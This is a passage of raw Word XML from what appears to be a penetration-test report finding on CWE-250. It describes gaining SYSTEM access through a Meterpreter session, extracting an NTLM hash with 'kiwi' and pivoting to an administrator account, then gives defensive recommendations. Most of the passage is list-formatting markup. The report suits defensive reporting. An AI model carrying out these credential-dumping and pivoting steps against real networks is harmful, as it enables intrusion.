        <w:t>Check this page for</w:t>
      </w:r>
      <w:r w:rsidR="005C6B58">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CWE-250: Execution with Unnecessary Privileges </w:t>
      </w:r>
      <w:r w:rsidR="005C6B58" w:rsidRPr="005C6B58">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="005C6B58">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="005C6B58" w:rsidRPr="00FB11C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/250.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F906C2D" w14:textId="77777777" w:rsidR="00FF68E7" w:rsidRDefault="00FF68E7" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2292CC65" w14:textId="77777777" w:rsidR="00FF68E7" w:rsidRDefault="00FF68E7" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc146821165"/>
      <w:r w:rsidRPr="0180BCFD">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="14BB805D" w14:textId="0F011938" w:rsidR="008D3BD8" w:rsidRDefault="008D3BD8" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008D3BD8">
        <w:t xml:space="preserve">The severity of this vulnerability is of the utmost concern as it grants the malicious actor the highest level of access. The utilization of a Meterpreter session simplifies the process of elevating access, exacerbating the level of risk. Following the acquisition of NT AUTHORITY\SYSTEM, we proceeded to pivot to </w:t>
      </w:r>
      <w:r w:rsidRPr="008D3BD8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ITWK04\itwk04admin</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3BD8">
        <w:t xml:space="preserve"> by leveraging the NTLM hash extracted using 'kiwi'. Pivoting empowers attackers to broaden their reach within a network, potentially compromising additional systems, databases, or sensitive data. Additionally, attackers can establish persistence on multiple systems, complicating the removal process for the security team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05604B87" w14:textId="77777777" w:rsidR="00FF68E7" w:rsidRDefault="00FF68E7" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3E3B61" w14:textId="77777777" w:rsidR="00FF68E7" w:rsidRDefault="00FF68E7" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc146821166"/>
      <w:r w:rsidRPr="0180BCFD">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2078E111" w14:textId="77777777" w:rsidR="00FF68E7" w:rsidRDefault="00FF68E7" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To mitigate this security issue, we recommend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759B221" w14:textId="01FF8781" w:rsidR="0070351F" w:rsidRDefault="00066605" w:rsidP="00066605">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Follow the principle of least privilege and assign only necessary permissions to perform specific tasks or access resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A15ECD0" w14:textId="7863D43B" w:rsidR="00066605" w:rsidRDefault="00066605" w:rsidP="00066605">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Keep all software, operating systems, and applications up to date with the latest security patches and updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1545B501" w14:textId="22F0122B" w:rsidR="00066605" w:rsidRDefault="00066605" w:rsidP="00066605">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Configure systems and applications securely by following best practices and security guidelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7936BC" w14:textId="533F588A" w:rsidR="00CF78EE" w:rsidRDefault="00CF78EE" w:rsidP="0070351F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6536907A" w14:textId="77777777" w:rsidR="0070351F" w:rsidRPr="00FF68E7" w:rsidRDefault="0070351F" w:rsidP="0070351F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0070351F" w:rsidRPr="00FF68E7">
      <w:headerReference w:type="default" r:id="rId33"/>
      <w:footerReference w:type="default" r:id="rId3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6C9FD" w14:textId="77777777" w:rsidR="005E67CE" w:rsidRDefault="005E67CE" w:rsidP="003C1D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="67F730EF" w14:textId="77777777" w:rsidR="005E67CE" w:rsidRDefault="005E67CE"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00A1E2DD" w:rsidR="003C1D22" w:rsidRPr="003C1D22" w:rsidRDefault="005568C9">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F6C72" w14:textId="77777777" w:rsidR="005E67CE" w:rsidRDefault="005E67CE" w:rsidP="003C1D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="08850E1A" w14:textId="77777777" w:rsidR="005E67CE" w:rsidRDefault="005E67CE"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44B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9AECC91A"/>
    <w:lvl w:ilvl="0" w:tplc="2A7AE1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372F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="055CD800"/>
    <w:lvl w:ilvl="0" w:tplc="1728A0AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2EAAA406">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F4445E54">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="18CCB12C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="93B4CD18">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BA561914">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9776F39E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A3A45D52">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A874F570">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11A350F2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F52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5009E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B61A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C590"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D33A0F6E"/>
    <w:lvl w:ilvl="0" w:tplc="57167BD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CB621D2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4CB65B38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="079A2086">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="35264D48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2314178C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="BCF20424">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="206AF104">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D352AAD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="18951202"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99BA07B2"/>
    <w:lvl w:ilvl="0" w:tplc="936C3CAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="64F45E86">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D3E0D026">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F5CA03B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4ED0063E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E1447A4E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8FEA87F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="03029E9A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F378F658">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E4183B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="692656CC"/>
    <w:lvl w:ilvl="0" w:tplc="5A46A946">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6F2A1BFA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C402FD2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7886448E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6CBA9ACE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="402C36FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DEB0A9AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="11BCB664">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9AC88A0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E496C51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33580C0C"/>
    <w:lvl w:ilvl="0" w:tplc="A67A2FDE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E60A94D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="AA4804B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5E2409FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1610E20C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="758291D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F098C046">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DCE4C19E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4A88BB34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="208D346F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0AA24554"/>
    <w:lvl w:ilvl="0" w:tplc="1EEA4480">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6C6E423A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="00FE6CB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2A08EC64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5BDEAA0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7C2057E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A73403DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0626633A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
